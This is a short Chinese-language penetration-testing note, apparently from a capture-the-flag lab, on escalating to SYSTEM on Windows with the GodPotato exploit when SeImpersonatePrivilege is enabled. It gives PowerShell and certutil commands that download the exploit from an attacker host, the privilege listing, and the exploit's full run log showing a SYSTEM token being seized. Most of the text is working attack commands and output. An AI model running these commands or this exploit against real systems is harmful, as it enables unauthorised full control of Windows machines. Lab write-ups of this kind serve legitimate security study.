发现当前用户开启了 SeImpersonatePrivilege 权限,那么可以直接用 GodPotato 进行提权
#下载
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
cmd /c powershell (New-Object Net.WebClient).DownloadFile('http://10.10.14.86/GodPotato-NET4.exe','GodPotato-NET4.exe')
certutil -f -split -urlcache http://10.10.14.86/GodPotato-NET4.exe
[s[uPS C:\Windows\system32> whoami /priv
[s[u
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeMachineAccountPrivilege Add workstations to domain Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
>>>> SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
#PS C:\users\public> ./GodPotato-NET4.exe -cmd "cmd /c whoami"
[s[u[*] CombaseModule: 0x140722987991040
[*] DispatchTable: 0x140722990582088
[*] UseProtseqFunction: 0x140722989873984
[*] UseProtseqFunctionParamCount: 6
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\d6f7c505-da5e-482f-817a-762b55d7f6a4\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 00008002-150c-ffff-6c31-89948fe64697
[*] DCOM obj OXID: 0x55d73fc18250f058
[*] DCOM obj OID: 0x386a599045f1bbd4
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] Pipe Connected!
[*] CurrentUser: NT AUTHORITY\NETWORK SERVICE
[*] CurrentsImpersonationLevel: Impersonation
[*] Start Search System Token
[*] PID : 916 Token:0x764 `User: NT AUTHORITY\SYSTEM `ImpersonationLevel: Impersonation
[*] Find System Token : True
[*] UnmarshalObject: 0x80070776
[*] CurrentUser: NT AUTHORITY\SYSTEM
[*] process start with pid 4436